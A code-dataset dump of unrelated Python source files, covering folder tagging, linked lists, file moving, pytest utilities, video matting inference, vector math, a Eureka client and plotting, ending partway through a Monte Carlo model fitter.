'''Usage: qq tag [FOLDER] NAME\nSave the folder FOLDER under the name NAME. If FOLDER is omitted, then\nthe current working directory is used. Subsequently, use 'qq tag.go NAME' to jump to\nthe folder.'''\n\n\nclass ListTagsCommand(qq.QQCommand):\n \"\"\"\n List tagged folders matching a regular expression pattern.\n \"\"\"\n\n name = 'tag.ls'\n shorttext = 'List tagged folders'\n\n def execute(self, pattern=None):\n tags = TagStorage()\n pattern = pattern or '.*'\n qq.output('Tagged folders matching the pattern {}:'.format(pattern))\n if len(tags['tags']) == 0:\n print(' No tags found.')\n else:\n for name, path in tags['tags'].iteritems():\n print(' * {0} ({1})'.format(name, path))\n return True\n\n def help(self):\n return '''Usage: qq tag.ls [PATTERN]\nList tagged folders, optionally filtering against a regular expression pattern.\n'''\n\n\nclass DeleteTagCommand(qq.QQCommand):\n \"\"\"\n Delete a tagged folder by name.\n \"\"\"\n\n name = 'tag.rm'\n shorttext = 'Delete a tagged folder'\n\n def execute(self, name):\n tags = TagStorage()\n path = tags['tags'].pop(name, None)\n if path:\n qq.output('Untagged folder {} with name \"{}\"'.format(path, name))\n else:\n qq.output('Tag not found: ' + name)\n return True\n\n def help(self):\n return '''Usage: qq tag.rm NAME\nDelete the tagged folder named NAME.'''\n\n\nclass GoToTagCommand(qq.QQCommand):\n \"\"\"\n Jump to a tagged folder.\n \"\"\"\n\n name = 'tag.go'\n shorttext = 'Jump to a tagged folder'\n\n def execute(self, name):\n tags = TagStorage()\n if name not in tags['tags']:\n qq.output('Tag not found: ' + name)\n return False\n path = tags['tags'][name]\n qq.shell_execute('cd \"{}\"'.format(path))\n qq.output('Changing to tagged folder \"{}\" ({})'.format(name, path))\n return True\n\n def help(self):\n return '''Usage: qq tag.rm NAME\nDelete the tagged folder named NAME.'''\n","sub_path":"cmd/tag.py","file_name":"tag.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"585710824","text":"\n\n# peer = '127.0.0.1'\npeer = '0.0.0.1'\ncmd = ['ping', '-c', '2', '-W', '1', peer]\nres = None\nimport subprocess\n\ntry:\n res = subprocess.check_output(\n cmd,\n shell=False\n ).decode('utf-8')\n# except subprocess.CalledProcessError as error:\n# print('error.stderr:{}'.format(error.stderr))\n# print('error.output:{}'.format(error.output))\nexcept Exception as e:\n print('cmd:{}'.format(cmd))\n print('error.output:{}'.format(e.output))\n print('error.stderr:{}'.format(e.stderr))\n\nprint('res:{}'.format(res))","sub_path":"ping/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"204189085","text":"class Node:\n def __init__(self,data):\n self.info = data\n self.next = None\n\nclass LinkedListV2:\n def __init__(self):\n self.head = None\n\n def display(self):\n if self.head is None:\n print(\"List is empty\")\n temp = self.head\n while temp:\n print(temp.info,end=\" \")\n temp = temp.next\n\n\n def insertAtEnd(self,data):\n self.data = Node(data)\n if self.head is None:\n self.head = self.data\n else:\n currNode = self.head # head refers to the first node\n while currNode.next is not None:\n currNode = currNode.next\n currNode.next = self.data\n\n def length(self):\n count = 0\n temp = self.head\n while temp:\n count +=1\n temp = temp.next\n print(\"Length of the list is \" , count)\n return None\n\n def search(self,item):\n count = 0\n temp = self.head\n while temp:\n count +=1\n if temp.info == item:\n print(\"Element found at \" , count , \" Position \")\n return\n temp = temp.next\n print(\"Element doesnt exist \")\n\n def insertAtBeg(self,item):\n node = Node(item)\n if self.head is None:\n self.head = node\n\n node.next = self.head\n self.head = node\n\n def insertaftergivenElement(self,element,data):\n temp = self.head\n\n while temp:\n if temp.info == element:\n node = Node(data)\n node.next = temp.next\n temp.next = node\n return\n temp = temp.next\n print(\"Element \" , element , \" doesnt exist \")\n\n def insertAtGivenPosition(self,data,pos):\n node = Node(data)\n if pos == 1:\n node.next = self.head\n self.head = node\n return\n\n temp = self.head\n\n while pos >2 and temp:\n temp = temp.next\n pos -=1\n\n node.next = temp.next\n temp.next = node\n\n\n def delete(self,item):\n if self.head is None:\n print(\"List is Empty\")\n return\n if self.head.info == item:\n self.temp = self.head\n self.head = self.head.next\n return\n\n self.p = None\n currnode = self.head\n\n while currnode:\n if currnode.info == item:\n self.temp = self.p.next # temp points to a node\n self.p.next = self.temp.next\n return\n self.p = currnode\n currnode = currnode.next\n print(\"Element doesnt exist\")\n\n\n\n\n\nif __name__==\"__main__\":\n list = LinkedListV2()\n list.insertAtEnd(1)\n list.insertAtEnd(2) # Insert at the end\n list.display()\n list.insertAtEnd(3)\n print(\"--------------------\")\n list.length()\n list.search(4)\n list.insertAtBeg(10)\n list.display()\n print(\"Printing Insert after element \")\n list.insertaftergivenElement(1,20)\n list.insertaftergivenElement(10,40)\n list.insertaftergivenElement(5,34)\n list.display()\n print(\"++++++++++++++++++++++\")\n list.insertAtGivenPosition(20,1)\n list.insertAtGivenPosition(30,3)\n list.display()\n list.delete(3)\n print(\"-----\")\n list.display()\n\n\n\n\n\n\n","sub_path":"LinkedList/LinkedListVersion2.py","file_name":"LinkedListVersion2.py","file_ext":"py","file_size_in_byte":3311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"446956959","text":"# -*-coding=utf-8-*-\nimport codecs\nimport os\nimport re\nimport shutil\n\n\ndef func():\n cwd = os.getcwd()\n print(cwd)\n cwd1 = os.path.dirname(__file__)\n print(cwd1)\n\n\n# p = re.compile('\\.txt')\n# print(cwd)\n# for dirpath, dirname, filename in os.walk(cwd):\n# # print(dirpath,dirname,filename)\n# #print(dirpath)\n# print(dirname)\n# print(type(filename))\n# if filename is not None:\n# for i in filename:\n# #if filename is not None:\n\n\n#\n# if p.search(i):\n# os.remove(os.path.join(dirpath, i))\n\n\ndef testcase1():\n i = \"memory\"\n sub_folder = os.path.join(os.getcwd(), i)\n print(sub_folder)\n\n\ndef testcase2():\n # read/readline/readlines\n f1 = open('data.cfg', 'r')\n r1 = f1.read()\n print('type of r1 ', type(r1))\n print('content of r1 ', r1)\n f1.close()\n\n f2 = open('data.cfg', 'r')\n r2 = f2.readlines()\n\n print('type of r2 ', type(r2))\n print('content of r2 ', r2)\n f2.close()\n\n f3 = open('data.cfg', 'r')\n r3 = f3.readline()\n\n print('type of r3 ', type(r3))\n print('content of r3 ', r3)\n r3 = f3.readline()\n\n print('type of r3 ', type(r3))\n print('content of r3 ', r3)\n\n r3 = f3.readline()\n\n print('type of r3 ', type(r3))\n print('content of r3 ', r3)\n\n f3.close()\n\n\ndef testcase4():\n fp = codecs.open('data/house_10.cfg', 'r', encoding='utf-8')\n data = fp.readlines()\n # print(data[:5])\n print(len(data))\n data = map(lambda x: x.split()[3:6], data)\n\n for i in range(5):\n print(data[i][0])\n print(data[i][2])\n # print(data[i][2])\n\n print(len(data))\n\n\n# 写入缓冲\ndef testcase5():\n f = open('data/buffer.txt', 'w', buffering=1)\n f.write(\"Hello world\")\n\n\ndef testcase6():\n file = os.listdir('.')\n for i in file:\n print(i)\n\n\ndef move_file():\n # current_path = os.getcwd()\n current_path = r'D:\\锤子手机相册\\坚果'\n for i in range(1, 13):\n try:\n folder_path = os.path.join(current_path,'2018-{}'.format(str(i).zfill(2)))\n os.mkdir(folder_path)\n except Exception as e:\n print(e)\n\n for dirname, dirs, files in os.walk(current_path):\n print(dirname, dirs, files, 'end')\n if files:\n for file in files:\n try:\n if re.findall('2018(\\d{2})', file):\n month = re.findall('IMG_2018(\\d{2})', file)[0]\n\n org_file = os.path.join(dirname,file)\n dst_file = os.path.join(current_path,'2018-{}'.format(month),file)\n # fpath,fname = os.path.split(file)\n\n shutil.move(org_file,dst_file)\n except Exception as e:\n print(e)\n\n\ndef main():\n # testcase6()\n # func()\n move_file()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"file_operation.py","file_name":"file_operation.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"638088520","text":"class ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\n\nclass Solution:\n def reverseList(self, head: ListNode) -> ListNode:\n \"\"\"迭代\"\"\"\n if not head:\n return None\n prev = None\n tail = tmp = head\n while tmp:\n tmp = tail.next\n tail.next = prev\n prev = tail\n tail = tmp\n\n return prev\n\n def reverseList2(self, head):\n \"\"\"递归\"\"\"\n if not head or not head.next:\n return head\n\n p = self.reverseList2(head.next)\n head.next.next = head\n head.next = None\n return p\n\n\na = ListNode(1)\na.next = ListNode(2)\na.next.next = ListNode(3)\na.next.next.next = ListNode(4)\n\ns = Solution()\ns.reverseList2(a)\n","sub_path":"leetcode_python/206. 反转链表.py","file_name":"206. 反转链表.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410986711","text":"# coding: utf-8\n\nimport collections\nimport functools\nimport math\nimport os\nimport re\nimport sys\n\nfrom . import config\nimport yatest_lib.tools\n\n\nSEP = '/'\nTEST_MOD_PREFIX = '__tests__.'\n\n\nclass SubtestInfo(object):\n skipped_prefix = '[SKIPPED] '\n\n @classmethod\n def from_str(cls, s):\n if s.startswith(SubtestInfo.skipped_prefix):\n s = s[len(SubtestInfo.skipped_prefix) :]\n skipped = True\n\n else:\n skipped = False\n\n return SubtestInfo(*s.rsplit(TEST_SUBTEST_SEPARATOR, 1), skipped=skipped)\n\n def __init__(self, test, subtest=\"\", skipped=False, **kwargs):\n self.test = test\n self.subtest = subtest\n self.skipped = skipped\n for key, value in kwargs.iteritems():\n setattr(self, key, value)\n\n def __str__(self):\n s = ''\n\n if self.skipped:\n s += SubtestInfo.skipped_prefix\n\n return s + TEST_SUBTEST_SEPARATOR.join([self.test, self.subtest])\n\n def __repr__(self):\n return str(self)\n\n\nclass Status(object):\n GOOD, XFAIL, FAIL, XPASS, MISSING, CRASHED, TIMEOUT = range(7)\n SKIPPED = -100\n NOT_LAUNCHED = -200\n CANON_DIFF = -300\n FLAKY = -1\n BY_NAME = {\n 'good': GOOD,\n 'fail': FAIL,\n 'xfail': XFAIL,\n 'xpass': XPASS,\n 'missing': MISSING,\n 'crashed': CRASHED,\n 'skipped': SKIPPED,\n 'flaky': FLAKY,\n 'not_launched': NOT_LAUNCHED,\n 'timeout': TIMEOUT,\n 'diff': CANON_DIFF,\n }\n TO_STR = {\n GOOD: 'good',\n FAIL: 'fail',\n XFAIL: 'xfail',\n XPASS: 'xpass',\n MISSING: 'missing',\n CRASHED: 'crashed',\n SKIPPED: 'skipped',\n FLAKY: 'flaky',\n NOT_LAUNCHED: 'not_launched',\n TIMEOUT: 'timeout',\n CANON_DIFF: 'diff',\n }\n\n\nclass Test(object):\n def __init__(self, name, path, status=None, comment=None, subtests=None):\n self.name = name\n self.path = path\n self.status = status\n self.comment = comment\n self.subtests = subtests or []\n\n def __eq__(self, other):\n if not isinstance(other, Test):\n return False\n return self.name == other.name and self.path == other.path\n\n def __str__(self):\n return \"Test [{} {}] - {} - {}\".format(self.name, self.path, self.status, self.comment)\n\n def __repr__(self):\n return str(self)\n\n def add_subtest(self, subtest):\n self.subtests.append(subtest)\n\n def setup_status(self, status, comment):\n self.status = Status.BY_NAME[status or 'good']\n if len(self.subtests) != 0:\n self.status = max(self.status, max(s.status for s in self.subtests))\n self.comment = comment\n\n def subtests_by_status(self, status):\n return [x.status for x in self.subtests].count(status)\n\n\nTEST_SUBTEST_SEPARATOR = '::'\n\n\n# TODO: extract color theme logic from ya\nCOLOR_THEME = {\n 'test_name': 'light-blue',\n 'test_project_path': 'dark-blue',\n 'test_dir_desc': 'dark-magenta',\n 'test_binary_path': 'light-gray',\n}\n\n\n# XXX: remove me\nclass YaCtx(object):\n pass\n\n\nya_ctx = YaCtx()\n\nTRACE_FILE_NAME = \"ytest.report.trace\"\n\n\ndef lazy(func):\n memory = {}\n\n @functools.wraps(func)\n def wrapper(*args):\n # Disabling caching in test mode\n if config.is_test_mode():\n return func(*args)\n\n try:\n return memory[args]\n except KeyError:\n memory[args] = func(*args)\n return memory[args]\n\n return wrapper\n\n\n@lazy\ndef _get_mtab():\n if os.path.exists(\"/etc/mtab\"):\n with open(\"/etc/mtab\") as afile:\n data = afile.read()\n return [line.split(\" \") for line in data.split(\"\\n\") if line]\n return []\n\n\n@lazy\ndef get_max_filename_length(dirname):\n \"\"\"\n Return maximum filename length for the filesystem\n :return:\n \"\"\"\n if sys.platform.startswith(\"linux\"):\n # Linux user's may work on mounted ecryptfs filesystem\n # which has filename length limitations\n for entry in _get_mtab():\n mounted_dir, filesystem = entry[1], entry[2]\n # http://unix.stackexchange.com/questions/32795/what-is-the-maximum-allowed-filename-and-folder-size-with-ecryptfs\n if filesystem == \"ecryptfs\" and dirname and dirname.startswith(mounted_dir):\n return 140\n # default maximum filename length for most filesystems\n return 255\n\n\ndef get_unique_file_path(dir_path, filename, cache=collections.defaultdict(set)):\n \"\"\"\n Get unique filename in dir with proper filename length, using given filename/dir.\n File/dir won't be created (thread nonsafe)\n :param dir_path: path to dir\n :param filename: original filename\n :return: unique filename\n \"\"\"\n max_suffix = 10000\n # + 1 symbol for dot before suffix\n tail_length = int(round(math.log(max_suffix, 10))) + 1\n # truncate filename length in accordance with filesystem limitations\n filename, extension = os.path.splitext(filename)\n # XXX\n if sys.platform.startswith(\"win\"):\n # Trying to fit into MAX_PATH if it's possible.\n # Remove after DEVTOOLS-1646\n max_path = 260\n filename_len = len(dir_path) + len(extension) + tail_length + len(os.sep)\n if filename_len < max_path:\n filename = yatest_lib.tools.trim_string(filename, max_path - filename_len)\n filename = (\n yatest_lib.tools.trim_string(filename, get_max_filename_length(dir_path) - tail_length - len(extension))\n + extension\n )\n candidate = os.path.join(dir_path, filename)\n\n key = dir_path + filename\n counter = sorted(\n cache.get(\n key,\n {\n 0,\n },\n )\n )[-1]\n while os.path.exists(candidate):\n cache[key].add(counter)\n counter += 1\n assert counter < max_suffix\n candidate = os.path.join(dir_path, filename + \".{}\".format(counter))\n return candidate\n\n\ndef escape_for_fnmatch(s):\n return s.replace(\"[\", \"[\").replace(\"]\", \"]\")\n\n\ndef get_python_cmd(opts=None, use_huge=True, suite=None):\n if opts and getattr(opts, 'flags', {}).get(\"USE_ARCADIA_PYTHON\") == \"no\":\n return [\"python\"]\n if suite and not suite._use_arcadia_python:\n return [\"python\"]\n if use_huge:\n return [\"$(PYTHON)/python\"]\n ymake_path = opts.ymake_bin if opts and getattr(opts, 'ymake_bin', None) else \"$(YMAKE)/ymake\"\n return [ymake_path, \"--python\"]\n\n\ndef normalize_name(name):\n replacements = [\n (\"\\\\\", \"\\\\\\\\\"),\n (\"\\n\", \"\\\\n\"),\n (\"\\t\", \"\\\\t\"),\n (\"\\r\", \"\\\\r\"),\n ]\n for from_, to in replacements:\n name = name.replace(from_, to)\n return name\n\n\n@lazy\ndef normalize_filename(filename):\n \"\"\"\n Replace invalid for file names characters with string equivalents\n :param some_string: string to be converted to a valid file name\n :return: valid file name\n \"\"\"\n not_allowed_pattern = r\"[\\[\\]\\/:*?\\\"\\'<>|+\\0\\\\\\s\\x0b\\x0c]\"\n filename = re.sub(not_allowed_pattern, \".\", filename)\n return re.sub(r\"\\.{2,}\", \".\", filename)\n\n\ndef get_test_log_file_path(output_dir, class_name, test_name, extension=\"log\"):\n \"\"\"\n get test log file path, platform dependant\n :param output_dir: dir where log file should be placed\n :param class_name: test class name\n :param test_name: test name\n :return: test log file name\n \"\"\"\n if os.name == \"nt\":\n # don't add class name to the log's filename\n # to reduce it's length on windows\n filename = test_name\n else:\n filename = \"{}.{}\".format(class_name, test_name)\n if not filename:\n filename = \"test\"\n filename += \".\" + extension\n filename = normalize_filename(filename)\n return get_unique_file_path(output_dir, filename)\n\n\n@lazy\ndef split_node_id(nodeid, test_suffix=None):\n path, possible_open_bracket, params = nodeid.partition('[')\n separator = \"::\"\n test_name = None\n if separator in path:\n path, test_name = path.split(separator, 1)\n path = _unify_path(path)\n class_name = os.path.basename(path)\n if test_name is None:\n test_name = class_name\n if test_suffix:\n test_name += \"::\" + test_suffix\n if separator in test_name:\n klass_name, test_name = test_name.split(separator, 1)\n if not test_suffix:\n # test suffix is used for flakes and pep8, no need to add class_name as it's === class_name\n class_name += separator + klass_name\n if separator in test_name:\n test_name = test_name.split(separator)[-1]\n test_name += possible_open_bracket + params\n return yatest_lib.tools.to_utf8(class_name), yatest_lib.tools.to_utf8(test_name)\n\n\n@lazy\ndef _suffix_test_modules_tree():\n root = {}\n\n for module in sys.extra_modules:\n if not module.startswith(TEST_MOD_PREFIX):\n continue\n\n module = module[len(TEST_MOD_PREFIX) :]\n node = root\n\n for name in reversed(module.split('.')):\n if name == '__init__':\n continue\n node = node.setdefault(name, {})\n\n return root\n\n\ndef _conftest_load_policy_is_local(path):\n return SEP in path and getattr(sys, \"is_standalone_binary\", False)\n\n\nclass MissingTestModule(Exception):\n pass\n\n\n# If CONFTEST_LOAD_POLICY==LOCAL the path parameters is a true test file path. Something like\n# /-B/taxi/uservices/services/alt/gen/tests/build/services/alt/validation/test_generated_files.py\n# If CONFTEST_LOAD_POLICY is not LOCAL the path parameter is a module name with '.py' extension added. Example:\n# validation.test_generated_files.py\n# To make test names independent of the CONFTEST_LOAD_POLICY value replace path by module name if possible.\n@lazy\ndef _unify_path(path):\n py_ext = \".py\"\n\n path = path.strip()\n if _conftest_load_policy_is_local(path) and path.endswith(py_ext):\n # Try to find best match for path as a module among test modules and use it as a class name.\n # This is the only way to unify different CONFTEST_LOAD_POLICY modes\n suff_tree = _suffix_test_modules_tree()\n node, res = suff_tree, []\n\n assert path.endswith(py_ext), path\n parts = path[: -len(py_ext)].split(SEP)\n\n # Use SEP as trailing terminator to make an extra step\n # and find a proper match when parts is a full matching path\n for p in reversed([SEP] + parts):\n if p in node:\n node = node[p]\n res.append(p)\n else:\n if res:\n return '.'.join(reversed(res)) + py_ext\n else:\n # Top level test module\n if TEST_MOD_PREFIX + p in sys.extra_modules:\n return p + py_ext\n # Unknown module - raise an error\n break\n\n raise MissingTestModule(\"Can't find proper module for '{}' path among: {}\".format(path, suff_tree))\n else:\n return path\n\n\ndef colorize_pytest_error(text):\n error_prefix = \"E \"\n blocks = [text]\n\n while True:\n text = blocks.pop()\n\n err_start = text.find(error_prefix, 1)\n if err_start == -1:\n return ''.join(blocks + [text])\n\n for pos in range(err_start + 1, len(text) - 1):\n if text[pos] == '\\n':\n if not text[pos + 1 :].startswith(error_prefix):\n err_end = pos + 1\n break\n else:\n err_end = len(text)\n\n bt, error, tail = text[:err_start], text[err_start:err_end], text[err_end:]\n\n filters = [\n # File path, line number and function name\n (\n re.compile(r\"^(.*?):(\\d+): in (\\S+)\", flags=re.MULTILINE),\n r\"[[unimp]]\\1[[rst]]:[[alt2]]\\2[[rst]]: in [[alt1]]\\3[[rst]]\",\n ),\n ]\n for regex, substitution in filters:\n bt = regex.sub(substitution, bt)\n\n blocks.append(bt)\n blocks.append('[[bad]]' + error)\n blocks.append(tail)\n","sub_path":"library/python/pytest/yatest_tools.py","file_name":"yatest_tools.py","file_ext":"py","file_size_in_byte":12053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"552313231","text":"from base.base_inference import VideoInference\nfrom models import UNet\nfrom models import DeepLabV3Plus\nfrom subprocess import call\nimport torch\nimport ffmpeg\nimport argparse\nimport sys\n\n\nparser = argparse.ArgumentParser(description=\"Arguments for the script\")\nparser.add_argument('--inp', type=str, help='Input video')\nparser.add_argument('--out', type=str, help='Output video')\nparser.add_argument('--model', type=str, help='Path to .pth pretrained model',\n default='./pretr/model.pth')\nparser.add_argument('--frange', nargs=2, type=int, help='Frame range to process')\n\n\nif len(sys.argv)==1:\n parser.print_help(sys.stderr)\n sys.exit(1)\n\n\nargs = parser.parse_args()\n\n\n\nif args.inp is None or args.out is None :\n print('No arguments specified. Exiting.')\n sys.exit(0)\n\n\n# CHECKPOINT = \"./pretr/DeepLabV3Plus_ResNet18.pth\"\nCHECKPOINT = args.model\nBACKBONE = \"resnet18\"\n\n\nif not torch.cuda.is_available() : \n print(\"GPU is not available. Abort.\")\n sys.exit(0)\n\n\nmodel = DeepLabV3Plus(backbone=BACKBONE, num_classes=2)\ntrained_dict = torch.load(CHECKPOINT, map_location=\"cpu\")['state_dict']\nmodel.load_state_dict(trained_dict, strict=False)\nmodel.cuda()\nmodel.eval()\nprint('Model loaded successfully.')\n\n\ninference = VideoInference(\n model=model,\n video_path=args.inp,\n video_out_path='./.tmp.mp4',\n input_size=320,\n background_path = \"./backgrounds/white.jpg\",\n use_cuda=True,\n draw_mode='matting',\n frame_range=args.frange\n)\n\nprint('Start processing frames...')\ninference.run()\nprint('Done.')\n\nprint('Running ffmpeg to merge video channels...')\nin1 = ffmpeg.input(args.inp)\nin2 = ffmpeg.input('./.tmp.mp4')\nout = ffmpeg.output(in1.audio, in2.video, args.out)\nout.run(overwrite_output=True)\nprint('All done.')\n\n\n\n\n","sub_path":"inf.py","file_name":"inf.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"38124450","text":"\nfrom math import sqrt\n\n\nclass Vetor3D:\n\n def __init__(self, x, y, z):\n\n self.x = x\n self.y = y\n self.z = z\n\n def get_x(self):\n \"\"\"Retorna a coordenada x, do vetor.\n \"\"\"\n return(self.x)\n\n def get_y(self):\n \"\"\"Retorna a coordenada y, do vetor.\n \"\"\"\n return(self.y)\n\n def get_z(self):\n \"\"\"Retorna a coordenada z, do vetor.\n \"\"\"\n return(self.z)\n\n def __str__(self):\n \"\"\"Retorna uma string que representa o vetor 3D.\n \"\"\"\n return(\"Vetor3D(\" + str(self.x) + \", \" + str(self.y) + \", \" \\\n + str(self.z) + \")\")\n\n def adiciona(self, outro_vetor):\n \"\"\"Retorna um novo vetor, que resulta da soma do vetor self\n com o vetor outro_vetor.\n \"\"\"\n return(Vetor3D(self.x + outro_vetor.x,\n self.y + outro_vetor.y,\n self.z + outro_vetor.z))\n\n def __add__(self, outro_vetor):\n \"\"\"Define o operador +.\n \"\"\"\n return(self.adiciona(outro_vetor))\n\n def multiplica_escalar(self, escalar):\n \"\"\"Retorna um novo vetor que resultado do vetor self\n multiplicado pelo escalar.\n \"\"\"\n return(Vetor3D(self.x * escalar,\n self.y * escalar,\n self.z * escalar))\n\n def __mul__(self, escalar):\n \"\"\"Define o operador * como sendo a multiplicação por escalar.\"\"\"\n return(self.multiplica_escalar(escalar))\n\n def comprimento(self):\n \"\"\"Retorna o comprimento do vetor.\n \"\"\"\n return(sqrt(self.x**2 + self.y**2 + self.z**2))\n\n # cálculo do versor\n def normaliza(self):\n \"\"\"Retorna o versor do vetor self (um novo vetor, com a mesma\n direção do vetor self mas com comprimento igual a 1).\n \"\"\"\n fator = 1.0 / self.comprimento()\n return(self * fator)\n\n def interno(self, outro_vetor):\n \"\"\"Retorna o produto interno entre o vetor self e um outro vetor\"\"\"\n return(self.x * outro_vetor.x + self.y * outro_vetor.y \\\n + self.z * outro_vetor.z)\n\n def externo(self, outro_vetor):\n \"\"\"Retorna o produto externo entre o vetor self e um outro vetor\"\"\"\n\n x1 = self.x\n y1 = self.y\n z1 = self.z\n\n x2 = outro_vetor.x\n y2 = outro_vetor.y\n z2 = outro_vetor.z\n\n # ex ey ez\n # x1 y1 z1\n # x2 y2 z2\n\n x = y1 * z2 - z1 * y2\n y = -(x1 * z2 - z1 * x2)\n z = x1 * y2 - y1 * x2\n\n return(Vetor3D(x, y, z))\n\n\nif __name__ == \"__main__\":\n\n # teste ao construtor\n v1 = Vetor3D(1.0, 2.0, 3.0)\n\n # teste a get_x, get_y e get_z\n print(\"coordenada x de v1\")\n print(v1.get_x())\n print(\"coordenada y de v1\")\n print(v1.get_y())\n print(\"coordenada z de v1\")\n print(v1.get_z())\n\n # teste a __str__\n print(\"vetor v1 = \")\n print(v1)\n\n # teste a adiciona\n v2 = Vetor3D(4.0, 5.0, 6.0)\n print(\"vetor v2 = \")\n print(v2)\n v3 = v1.adiciona(v2)\n print(\"vetor v3 = \")\n print(v3)\n\n # teste a +\n v4 = v1 + v2\n print(\"vetor v4 = \")\n print(v4)\n\n # teste a multiplica_escalar\n escalar = 10.0\n v5 = v1.multiplica_escalar(escalar)\n print(\"vetor v5 = \")\n print(v5)\n\n # teste a *\n v6 = v1 * escalar\n print(\"vetor v6 = \")\n print(v6)\n\n # a linha seguinte dá erro de execução\n # porque a operação float * Vetor3D não está\n # definida na classe float\n # v7 = escalar * v6\n\n # teste a comprimento\n v8 = Vetor3D(0.0, 10.0, 0.0)\n print(\"comprimento de v8 = \")\n print(str(v8.comprimento()))\n print(\"comprimento de v1 = \")\n print(str(v1.comprimento()))\n\n # teste a normaliza\n v9 = v1.normaliza()\n print(\"v9 = versor de v1 =\")\n print(str(v9))\n print(\"norma de v9 =\")\n print(v9.comprimento())\n\n # teste a interno\n v10 = Vetor3D(1.0, 0.0, 0.0)\n v11 = Vetor3D(0.0, 1.0, 0.0)\n print(\"v10 interno de v11 = \")\n print(str(v10.interno(v11)))\n\n # teste a externo\n v12 = v1.externo(v2)\n print(\"v12 = v1 externo de v2 = \")\n print(str(v12))\n print(\"v12 interno com v1 = \")\n print(str(v12.interno(v1)))\n print(\"v12 interno com v2 = \")\n print(str(v12.interno(v2)))\n","sub_path":"projeto_33376/vetor_33376.py","file_name":"vetor_33376.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"259768547","text":"# -*- coding: utf-8 -*-\n\nimport asyncio\nimport tornado.web\nfrom wasp_eureka import EurekaClient\nfrom tornado.options import define, options\n\ndefine(\"port\", default=7171, help=\"run on the given port\", type=int)\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n def get(self):\n self.write('[GET] python tornado...')\n\n\n\n\n\nasync def main():\n result = await eureka.register()\n print(\"[Register Rureka] result: %s\" % result)\n\n tornado.options.parse_command_line()\n app = tornado.web.Application(\n handlers=[(r'/', IndexHandler)],\n debug=True\n )\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\n while True:\n await asyncio.sleep(60)\n await eureka.renew()\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop() # 创建事件循环\n app_name = 'linjk-python-eureka-client'\n ip = '192.168.1.109'\n my_eureka_url = 'http://10.64.140.34:8761'\n eureka = EurekaClient(app_name=app_name, port=options.port, ip_addr=ip,\n hostname=\"localhost\", eureka_url=my_eureka_url, loop=loop)\n \n\n loop.run_until_complete(main())\n","sub_path":"eureka.py","file_name":"eureka.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"272270389","text":"#-*- using utf-8 -*-\nimport time\nimport os\nimport argparse\nimport statistics\nimport math\nfrom matplotlib import pyplot as plt\n\nimport numpy as np\nimport glob\n\ndef plot(record, file_name=\"img.png\", sec_scale=\"mill\"):\n fig = plt.figure()\n if sec_scale == \"mill\":\n scale = 1000.0\n sec_unit = \"[ms]\"\n elif sec_scale == \"micro\":\n scale = 1e6\n sec_unit = \"[micros]\"\n else:\n scale = 1.0\n sec_unit = \"[s]\"\n\n for data in record:\n n = data[\"n\"]\n mean = data[\"mean\"] * scale\n median = data[\"median\"] * scale\n std = data[\"std\"] * scale\n label = data[\"label\"][0]\n plt.plot(n, mean, label=label)\n plt.fill_between(n, (mean-std), (mean+std), alpha=0.4)\n print(label)\n print(mean[-1])\n print(\"###################\")\n\n plt.legend()\n plt.xlabel(\"nums of files\")\n plt.ylabel(\"time\" + sec_unit)\n fig.savefig(file_name)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n \n parser.add_argument(\"--sec_scale\", type=str, default=\"mill\")\n\n args = parser.parse_args()\n sec_scale = args.sec_scale\n\n record = []\n files = glob.glob(\"out/image_*.npz\")\n for file in files:\n print(file)\n record.append(np.load(file))\n\n plot(record, file_name=\"fig/image_graph.png\", sec_scale=sec_scale)\n os.system(\"xdg-open fig/image_graph.png\")\n\n","sub_path":"plot_image.py","file_name":"plot_image.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319228874","text":"from math import pi\nfrom decimal import Decimal\n\nfrom numpy import array, unique, std, log, mean, isnan, nonzero\nfrom numpy.random import randn\n\nfrom src import Face\nfrom .ModelFitter import ModelFitter\n\n\nclass MonteCarloFitter(ModelFitter):\n def __init__(self, image, dimensions=199, model=None, initial_face=None,\n estimating_parameters=None, iterating_parameters=None,\n steps=100, callback=None):\n \"\"\"\n Keyword arguments:\n - estimating_parameters Parameters to estimate.\n - iterating_parameters Parameters to integrate by\n in addition to parameters to estimate.\n \"\"\"\n super(MonteCarloFitter, self).__init__(image, dimensions, model,\n initial_face, callback)\n\n assert len(estimating_parameters) > 0\n if iterating_parameters is None:\n iterating_parameters = list(range(dimensions))\n\n self.__iterating_parameters = unique(\n estimating_parameters + iterating_parameters)\n self.__estimating_parameters = array(estimating_parameters)\n\n self.__parameters = None\n self.__differences = None\n self.__image = image\n self.__values = []\n self.__steps = steps\n\n def start(self):\n self.__parameters = []\n self.__differences = []\n\n for parameter in range(self.__steps):\n self.request_face(self.__generate_face_parameters(), parameter)\n\n def receive_image(self, image, index=None):\n indices = nonzero(image[:, -1])\n\n difference = (self.__image - image[:, 0])[indices].flatten()\n variance = std(difference)**2\n\n 